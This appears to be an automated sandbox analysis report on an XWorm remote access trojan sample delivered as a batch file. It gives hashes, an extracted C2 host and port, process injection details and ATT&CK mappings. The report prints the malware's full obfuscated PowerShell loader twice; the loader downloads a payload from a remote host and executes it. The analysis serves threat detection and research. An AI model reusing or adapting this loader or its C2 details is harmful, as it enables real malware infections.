xworm | 76611689034914a32d83d3fafbd528f7498fcd80a78c19fb2d8e93f39ce14dc6

General

Target

xff.cmd
Size

6KB
MD5

798c0f3c0c128497007a0616ef8d6b93
SHA1

cedbb573042a3275475973d0a6d45510a1941cd1
SHA256

76611689034914a32d83d3fafbd528f7498fcd80a78c19fb2d8e93f39ce14dc6
SHA512

f64eafe2d84b867ced4c430743cdfb3a4be3eac0a2d4a53114e9a815ebe5e4a5e94e4d7eed6d8ae647d25191994d88a7ae826717c50fc9e14c7a4de866868999
SSDEEP

192:wTcnW0e8ORczJDWx3CDKZJ4VKwUg9j16NuK:meC89VDWxUKZJm5p1/K

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

nmds.duckdns.org:8895

Mutex

O3B5rRVaa3oX74CD

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3596-72-0x0000000000CC0000-0x0000000000CCE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

9 1924 powershell.exe
16 1924 powershell.exe
21 1924 powershell.exe
23 1924 powershell.exe
24 1924 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1924 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

3596 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

468 powershell.exe
3596 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 468 set thread context of 3596 468 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

1924 powershell.exe
1924 powershell.exe
468 powershell.exe
468 powershell.exe
468 powershell.exe
3596 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

468 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 1924 powershell.exe
Token: SeDebugPrivilege 468 powershell.exe
Token: SeDebugPrivilege 3596 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

3596 wab.exe

flow	pid	process
9	1924	powershell.exe
16	1924	powershell.exe
21	1924	powershell.exe
23	1924	powershell.exe
24	1924	powershell.exe

pid	process
1924	powershell.exe

pid	process
3596	wab.exe

pid	process
468	powershell.exe
3596	wab.exe

description	pid	process	target process
PID 468 set thread context of 3596	468	powershell.exe	wab.exe

pid	process
1924	powershell.exe
1924	powershell.exe
468	powershell.exe
468	powershell.exe
468	powershell.exe
3596	wab.exe

pid	process
468	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	468	powershell.exe
Token: SeDebugPrivilege	3596	wab.exe

pid	process
3596	wab.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4024 wrote to memory of 1924	4024	cmd.exe	powershell.exe
PID 4024 wrote to memory of 1924	4024	cmd.exe	powershell.exe
PID 1924 wrote to memory of 2232	1924	powershell.exe	cmd.exe
PID 1924 wrote to memory of 2232	1924	powershell.exe	cmd.exe
PID 1924 wrote to memory of 468	1924	powershell.exe	powershell.exe
PID 1924 wrote to memory of 468	1924	powershell.exe	powershell.exe
PID 1924 wrote to memory of 468	1924	powershell.exe	powershell.exe
PID 468 wrote to memory of 5016	468	powershell.exe	cmd.exe
PID 468 wrote to memory of 5016	468	powershell.exe	cmd.exe
PID 468 wrote to memory of 5016	468	powershell.exe	cmd.exe
PID 468 wrote to memory of 3596	468	powershell.exe	wab.exe
PID 468 wrote to memory of 3596	468	powershell.exe	wab.exe
PID 468 wrote to memory of 3596	468	powershell.exe	wab.exe
PID 468 wrote to memory of 3596	468	powershell.exe	wab.exe
PID 468 wrote to memory of 3596	468	powershell.exe	wab.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xff.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1924

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
3⤵
PID:2232

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
4⤵
PID:5016

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3596

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p3zmodqq.yul.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Tider.Dre
Filesize
455KB

MD5
b3908211a29c523da70d8ce9797a087a

SHA1
c99a1d080cb474fd51dbd51f75b753d0efb5d17a

SHA256
15b86fe8ba861e241bd317292e649ee349f0a35c0e2ddb4669989e907689e128

SHA512
dff97fd11075c912f6aea454d2fac846787fb3747c92a0270cd212391c693cc8b9d3495ebb9c416f71d41d935c99e6f37ca9eb4767ccb808dc1a985278095fa4

Download Submit
memory/468-43-0x0000000007300000-0x000000000797A000-memory.dmp

Filesize
6.5MB

Download
memory/468-27-0x0000000075080000-0x0000000075830000-memory.dmp

Filesize
7.7MB

Download
memory/468-71-0x0000000075080000-0x0000000075830000-memory.dmp

Filesize
7.7MB

Download
memory/468-45-0x0000000006D80000-0x0000000006E16000-memory.dmp

Filesize
600KB

Download
memory/468-24-0x0000000002150000-0x0000000002186000-memory.dmp

Filesize
216KB

Download
memory/468-25-0x0000000075080000-0x0000000075830000-memory.dmp

Filesize
7.7MB

Download
memory/468-26-0x0000000004CD0000-0x00000000052F8000-memory.dmp

Filesize
6.2MB

Download
memory/468-46-0x0000000006CE0000-0x0000000006D02000-memory.dmp

Filesize
136KB

Download
memory/468-28-0x0000000004BB0000-0x0000000004BD2000-memory.dmp

Filesize
136KB

Download
memory/468-29-0x00000000053B0000-0x0000000005416000-memory.dmp

Filesize
408KB

Download
memory/468-30-0x0000000005420000-0x0000000005486000-memory.dmp

Filesize
408KB

Download
memory/468-40-0x0000000005490000-0x00000000057E4000-memory.dmp

Filesize
3.3MB

Download
memory/468-41-0x0000000005A70000-0x0000000005A8E000-memory.dmp

Filesize
120KB

Download
memory/468-47-0x0000000007F30000-0x00000000084D4000-memory.dmp

Filesize
5.6MB

Download
memory/468-60-0x0000000075080000-0x0000000075830000-memory.dmp

Filesize
7.7MB

Download
memory/468-44-0x0000000006000000-0x000000000601A000-memory.dmp

Filesize
104KB

Download
memory/468-23-0x000000007508E000-0x000000007508F000-memory.dmp

Filesize
4KB

Download
memory/468-59-0x000000007508E000-0x000000007508F000-memory.dmp

Filesize
4KB

Download
memory/468-42-0x0000000005B10000-0x0000000005B5C000-memory.dmp

Filesize
304KB

Download
memory/468-49-0x00000000084E0000-0x000000000B305000-memory.dmp

Filesize
46.1MB

Download
memory/1924-76-0x00007FF9BD410000-0x00007FF9BDED1000-memory.dmp

Filesize
10.8MB

Download
memory/1924-50-0x00007FF9BD413000-0x00007FF9BD415000-memory.dmp

Filesize
8KB

Download
memory/1924-51-0x00007FF9BD410000-0x00007FF9BDED1000-memory.dmp

Filesize
10.8MB

Download
memory/1924-13-0x00007FF9BD410000-0x00007FF9BDED1000-memory.dmp

Filesize
10.8MB

Download
memory/1924-2-0x00007FF9BD413000-0x00007FF9BD415000-memory.dmp

Filesize
8KB

Download
memory/1924-8-0x0000012E6E520000-0x0000012E6E542000-memory.dmp

Filesize
136KB

Download
memory/1924-14-0x00007FF9BD410000-0x00007FF9BDED1000-memory.dmp

Filesize
10.8MB

Download
memory/3596-70-0x0000000000CC0000-0x0000000001F14000-memory.dmp

Filesize
18.3MB

Download
memory/3596-73-0x0000000022470000-0x000000002250C000-memory.dmp

Filesize
624KB

Download
memory/3596-72-0x0000000000CC0000-0x0000000000CCE000-memory.dmp

Filesize
56KB

Download
memory/3596-77-0x00000000227F0000-0x0000000022882000-memory.dmp

Filesize
584KB

Download
memory/3596-78-0x0000000022460000-0x000000002246A000-memory.dmp

Filesize
40KB

Download
memory/3596-90-0x0000000022AC0000-0x0000000022ACA000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing